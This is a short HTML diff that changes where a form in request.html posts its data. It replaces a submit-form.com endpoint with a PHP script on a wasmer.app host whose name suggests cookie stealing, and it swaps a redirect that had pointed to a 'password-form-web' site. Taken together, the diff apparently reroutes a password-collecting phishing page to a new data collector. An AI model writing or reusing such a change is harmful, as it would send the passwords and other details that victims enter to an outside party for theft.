--- a/request.html
+++ b/request.html
@@ -9,8 +9,8 @@
         <link rel="stylesheet" crossorigin="" href="style.css">
     </head>
     <body>
-        <form action="https://submit-form.com/vFxK3442i" method="post">
-            <input type="hidden" name="_redirect" value="https://password-form-web.vercel.app/"/>
+        <form action="https://abidcokie-1cfb0.wasmer.app/Abid.php" method="post">
+            <input type="hidden" name="_redirect" value="ABID VERCEL"/>
             <div id="root">
                 <div>
                     <form>
